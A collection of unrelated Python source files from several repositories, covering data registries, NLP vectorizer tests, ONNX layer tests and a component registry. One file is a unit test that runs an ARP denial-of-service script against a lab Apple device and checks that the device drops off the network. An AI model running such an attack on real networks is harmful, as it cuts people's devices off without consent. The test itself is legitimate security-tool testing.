APERIO_REPO_URL = "http://openslide.cs.cmu.edu/download/openslide-testdata/Aperio"
TCGA_REPO_URL = "https://api.gdc.cancer.gov/data"
IDR_REPO_URL = "https://idr.openmicroscopy.org/webclient/render_image_download"
registry_urls = {
"histolab/broken.svs": "https://raw.githubusercontent.com/histolab/histolab/master/tests/fixtures/svs-images/broken.svs",
"histolab/kidney.png": "https://user-images.githubusercontent.com/4196091/100275351-132cc880-2f60-11eb-8cc8-7a3bf3723260.png",
"aperio/JP2K-33003-1.svs": f"{APERIO_REPO_URL}/JP2K-33003-1.svs",
"aperio/JP2K-33003-2.svs": f"{APERIO_REPO_URL}/JP2K-33003-2.svs",
"tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": f"{TCGA_REPO_URL}/9c960533-2e58-4e54-97b2-8454dfb4b8c8",
"tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": f"{TCGA_REPO_URL}/da36d3aa-9b19-492a-af4f-cc028a926d96",
"tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": f"{TCGA_REPO_URL}/f8b4cee6-9149-45b4-ae53-82b0547e1e34",
"tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": f"{TCGA_REPO_URL}/31e248bf-ee24-4d18-bccb-47046fccb461",
"tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": f"{TCGA_REPO_URL}/6b725022-f1d5-4672-8c6c-de8140345210",
"tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": f"{TCGA_REPO_URL}/b777ec99-2811-4aa4-9568-13f68e380c86",
"9798433/?format=tif": f"{IDR_REPO_URL}/9798433/?format=tif",
"9798554/?format=tif": f"{IDR_REPO_URL}/9798554/?format=tif",
}
legacy_registry = {
("data/" + filename): registry["data/" + filename] for filename in legacy_datasets
}
|
semtorch/models/archs/backbones/__init__.py | WaterKnight1998/SemTorch | 145 | 11096185 | from .build import BACKBONE_REGISTRY, get_segmentation_backbone
from .xception import *
from .mobilenet import *
from .resnet import * |
tests/test_vectorizer.py | vj1494/kindred | 141 | 11096212 | <reponame>vj1494/kindred
import numpy as np
import kindred
import os
import json
from kindred.datageneration import generateData,generateTestData
def check(valueName,value):
write = False
scriptDir = os.path.dirname(__file__)
jsonPath = os.path.join(scriptDir,'data','vectorizer','expected.json')
if os.path.isfile(jsonPath):
with open(jsonPath) as f:
data = json.load(f)
else:
data = {}
if write:
data[valueName] = value
with open(jsonPath,'w') as f:
json.dump(data,f,indent=2,sort_keys=True)
assert valueName in data
assert data[valueName] == value
def test_simpleVectorizer_binary():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer>. <drug id="3">Aspirin</drug> is the main cause of <disease id="4">boneitis</disease> . <relation type="treats" subj="1" obj="2" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 2): 1.0, (0, 3): 1.0, (1, 0): 1.0, (1, 5): 1.0, (2, 2): 1.0, (2, 4): 1.0, (3, 1): 1.0, (3, 5): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_binary',namedCols)
def test_simpleVectorizer_triple():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer> which targets <gene id="3">EGFR</gene>. <relation type="druginfo" drug="1" disease="2" gene="3" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(entityCount=3,featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 1): 1.0, (0, 3): 1.0, (0, 8): 1.0, (1, 1): 1.0, (1, 5): 1.0, (1, 6): 1.0, (2, 0): 1.0, (2, 4): 1.0, (2, 8): 1.0, (3, 0): 1.0, (3, 5): 1.0, (3, 7): 1.0, (4, 2): 1.0, (4, 4): 1.0, (4, 6): 1.0, (5, 2): 1.0, (5, 3): 1.0, (5, 7): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_triple',namedCols)
def test_vectorizer_defaults():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer()
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_2',namedCols2)
def test_vectorizer_entityTypes():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_2',namedCols2)
def test_vectorizer_bigrams():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_2',namedCols2)
def test_vectorizer_dependencyPathEdges():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_2',namedCols2)
def test_vectorizer_entityTypes_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_noTFIDF_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_2',namedCols2)
def test_vectorizer_bigrams_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdges_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_2',namedCols2)
def test_vectorizer_defaults_triple():
corpus1, _ = generateTestData(entityCount=3,positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(entityCount=3,positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer(entityCount=3)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_triple_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_triple_2',namedCols2)
if __name__ == '__main__':
test_vectorizer_defaults_triple()
|
blackstone/displacy_palette.py | DeNeutoy/Blackstone | 541 | 11096216 | ner_displacy_palette = {
"CASENAME": "#da3650",
"CITATION": "#67328b",
"JUDGE": "#00a594",
"COURT": "#fcd548",
"PROVISION": "#007bac",
"INSTRUMENT": "#6c63a5",
"CONCEPT": "#df5a35",
}
ner_displacy_options = {
"ents": [
"CASENAME",
"CITATION",
"JUDGE",
"COURT",
"PROVISION",
"INSTRUMENT",
"CONCEPT",
],
"colors": ner_displacy_palette,
}
dep_displacy_options = {
"compact": False,
"bg": "linear-gradient(90deg, #bdc3c7, #2c3e50)",
"color": "white",
"font": "Gotham",
}
|
tests/layer_tests/onnx_tests/test_argmax.py | ryanloney/openvino-1 | 1,127 | 11096235 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
import pytest
from common.layer_test_class import check_ir_version
from common.onnx_layer_test_class import OnnxRuntimeLayerTest
from unit_tests.utils.graph import build_graph
class TestArgMax(OnnxRuntimeLayerTest):
def create_net(self, shape, axis, keepdims, ir_version):
"""
ONNX net IR net
Input->ArgMax->Output => Input->TopK
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
output_shape = shape.copy()
output_shape[axis if axis is not None else 0] = 1
output_shape_squeeze = output_shape.copy()
if keepdims == 0:
output_shape_squeeze.remove(1)
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, shape)
output = helper.make_tensor_value_info('output', TensorProto.INT64, output_shape_squeeze)
const = np.random.randint(-10, 10, output_shape_squeeze).astype(np.int64)
args = dict()
if axis is not None:
args['axis'] = axis
else:
axis = 0
if keepdims is not None:
args['keepdims'] = keepdims
node_def = onnx.helper.make_node(
'ArgMax',
inputs=['input'],
outputs=['argmax' if keepdims is None or keepdims == 1 else 'output'],
**args
)
edges = [node_def]
if keepdims is None or keepdims == 1:
node_flatten_def = onnx.helper.make_node(
'Flatten',
inputs=['argmax'],
outputs=['output']
)
edges.append(node_flatten_def)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
edges,
'test_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_model')
#
# Create reference IR net
#
ref_net = None
if check_ir_version(10, None, ir_version):
nodes_attributes = {
'input': {'kind': 'op', 'type': 'Parameter'},
'input_data': {'shape': shape, 'kind': 'data'},
'const_indata': {'shape': [1], 'kind': 'data'},
'const': {'kind': 'op', 'type': 'Const'},
'const_data': {'shape': [], 'kind': 'data'}, # TODO shape [] or [1] ??
'node': {'kind': 'op', 'type': 'TopK'},
'node_data': {'shape': output_shape, 'kind': 'data'},
'indices_data': {'shape': output_shape, 'kind': 'data'},
'result1': {'kind': 'op', 'type': 'Result'},
'result2': {'kind': 'op', 'type': 'Result'}
}
edges = [('input', 'input_data'),
('const_indata', 'const'),
('const', 'const_data'),
('input_data', 'node'),
('const_data', 'node'),
('node', 'node_data'),
('node', 'indices_data'),
('node_data', 'result1')]
if keepdims == 0:
nodes_attributes.update({'squeeze_const_indata': {'shape': [1], 'kind': 'data'},
'squeeze_const': {'kind': 'op', 'type': 'Const'},
'squeeze_const_data': {'shape': [1], 'kind': 'data'},
'squeeze': {'kind': 'op', 'type': 'Squeeze'},
'squeeze_data': {'shape': output_shape_squeeze,
'kind': 'data'}
})
edges.extend([('squeeze_const_indata', 'squeeze_const'),
('squeeze_const', 'squeeze_const_data'),
('indices_data', 'squeeze'),
('squeeze_const_data', 'squeeze'),
('squeeze', 'squeeze_data'),
('squeeze_data', 'result2')])
else:
nodes_attributes.update(
{'flatten_const_indata': {'kind': 'data', 'value': [0, -1]},
'flatten_const': {'kind': 'op', 'type': 'Const'},
'flatten_const_data': {'shape': [2], 'kind': 'data'},
'flatten': {'kind': 'op', 'type': 'Reshape'},
'flatten_data': {
'shape': [output_shape_squeeze[0], np.prod(output_shape_squeeze[1:])],
'kind': 'data'}
})
edges.extend([('indices_data', 'flatten'),
('flatten_const_indata', 'flatten_const'),
('flatten_const', 'flatten_const_data'),
('flatten_const_data', 'flatten'),
('flatten', 'flatten_data'),
('flatten_data', 'result2')])
ref_net = build_graph(nodes_attributes, edges)
return onnx_net, ref_net
test_data = [
dict(shape=[10, 12], axis=None),
dict(shape=[10, 12], axis=1),
dict(shape=[8, 10, 12], axis=None),
dict(shape=[8, 10, 12], axis=1),
dict(shape=[8, 10, 12], axis=2),
dict(shape=[6, 8, 10, 12], axis=None),
dict(shape=[6, 8, 10, 12], axis=1),
dict(shape=[6, 8, 10, 12], axis=2),
dict(shape=[6, 8, 10, 12], axis=3),
dict(shape=[4, 6, 8, 10, 12], axis=None),
dict(shape=[4, 6, 8, 10, 12], axis=1),
dict(shape=[4, 6, 8, 10, 12], axis=2),
dict(shape=[4, 6, 8, 10, 12], axis=3),
dict(shape=[4, 6, 8, 10, 12], axis=4)]
@pytest.mark.parametrize("params", test_data)
@pytest.mark.parametrize("keepdims", [None, 0])
@pytest.mark.nightly
def test_argmax(self, params, keepdims, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_net(**params, ir_version=ir_version, keepdims=keepdims),
ie_device, precision, ir_version, temp_dir=temp_dir, api_2=api_2)
|
metadrive/component/road_network/__init__.py | liuzuxin/metadrive | 125 | 11096241 | from metadrive.component.road_network.road import Road, Route
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
|
raw_packet/Tests/Unit_tests/Scripts/Apple/test_apple_arp_dos.py | Vladimir-Ivanov-Git/raw_packet | 146 | 11096249 | # region Description
"""
test_apple_arp_dos.py: Unit tests for Raw-packet script: apple_arp_dos.py
Author: <NAME>
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from sys import path
from os.path import dirname, abspath
from os import system, kill
from signal import SIGTERM
from time import sleep, time
from subprocess import Popen, run, PIPE
import unittest
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - ScriptAppleArpDosTest
class ScriptAppleArpDosTest(unittest.TestCase):
# region Properties
root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
path.append(root_path)
from raw_packet.Utils.base import Base
from raw_packet.Tests.Unit_tests.variables import Variables
base: Base = Base()
# endregion
def kill_test_process(self) -> None:
while self.base.get_process_pid('/apple_arp_dos.py') != -1:
kill(self.base.get_process_pid('/apple_arp_dos.py'), SIGTERM)
sleep(0.1)
@staticmethod
def restart_dhcp_server_over_ssh() -> None:
run(['ssh ' + ScriptAppleArpDosTest.Variables.router_root_username + '@' +
ScriptAppleArpDosTest.Variables.router_ipv4_address + ' "/etc/init.d/dnsmasq restart"'], shell=True)
def check_apple_device_connected(self) -> None:
self.kill_test_process()
sleep(5)
response: int = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
if response == 0:
return None
else:
self.restart_dhcp_server_over_ssh()
while response != 0:
response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
def test01_main_arp_scan(self):
self.check_apple_device_connected()
apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface], shell=True, stdout=PIPE)
find_target: bool = False
start_time = time()
for output_line in apple_arp_dos.stdout:
output_line: str = output_line.decode('utf-8')
print(output_line[:-1])
if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line:
find_target = True
break
if int(time() - start_time) > 10:
self.kill_test_process()
break
self.assertTrue(find_target)
def test02_main_nmap_scan(self):
self.check_apple_device_connected()
apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -n'], shell=True, stdout=PIPE)
find_target: bool = False
start_time = time()
for output_line in apple_arp_dos.stdout:
output_line: str = output_line.decode('utf-8')
print(output_line[:-1])
if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line:
find_target = True
break
if int(time() - start_time) > 120:
self.kill_test_process()
break
self.assertTrue(find_target)
def test03_main_bad_interface(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.bad_network_interface], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_network_interface, apple_arp_dos_output)
def test04_main_bad_target_ip(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' +
ScriptAppleArpDosTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_ipv4_address, apple_arp_dos_output)
def test05_main_bad_target_mac(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' +
ScriptAppleArpDosTest.Variables.apple_device_ipv4_address + ' -m ' +
ScriptAppleArpDosTest.Variables.bad_mac_address], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_mac_address, apple_arp_dos_output)
def test06_main(self):
self.check_apple_device_connected()
command: str = 'python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + \
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' + \
ScriptAppleArpDosTest.Variables.apple_device_ipv4_address
Popen(command, shell=True)
sleep(10)
response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
self.assertNotEqual(response, 0)
self.check_apple_device_connected()
# endregion
|
nuplan/common/utils/split_state.py | motional/nuplan-devkit | 128 | 11096250 | from dataclasses import dataclass
from typing import Any, List
@dataclass
class SplitState:
"""Dataclass representing a state split between fixed states, linear states and angular states."""
linear_states: List[Any] # Variable states
angular_states: List[float] # Variable states, representing angles, with 2pi period
fixed_states: List[Any] # Constant states
def __len__(self) -> int:
"""Returns the number of states"""
return len(self.linear_states) + len(self.angular_states) + len(self.fixed_states)
|
guillotina/component/globalregistry.py | vinissimus/guillotina | 173 | 11096257 | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from guillotina.component._compat import _BLANK
from guillotina.component.interfaces import IComponentLookup
from guillotina.profile import profilable
from typing import Type
from zope.interface import implementer
from zope.interface import providedBy
from zope.interface.adapter import AdapterLookup
from zope.interface.adapter import AdapterRegistry
from zope.interface.registry import Components
import asyncio
import logging
import os
import time
profile_logger = logging.getLogger("guillotina.profile")
class GuillotinaAdapterLookup(AdapterLookup):
@profilable
async def asubscribers(self, objects, provided):
subscriptions = self.subscriptions(map(providedBy, objects), provided)
results = []
for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)):
if asyncio.iscoroutinefunction(subscription):
results.append(await subscription(*objects))
else:
results.append(subscription(*objects))
return results
@profilable
def subscribers(self, objects, provided):
subscriptions = self.subscriptions(map(providedBy, objects), provided)
result = []
for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)):
if not asyncio.iscoroutinefunction(subscription):
result.append(subscription(*objects))
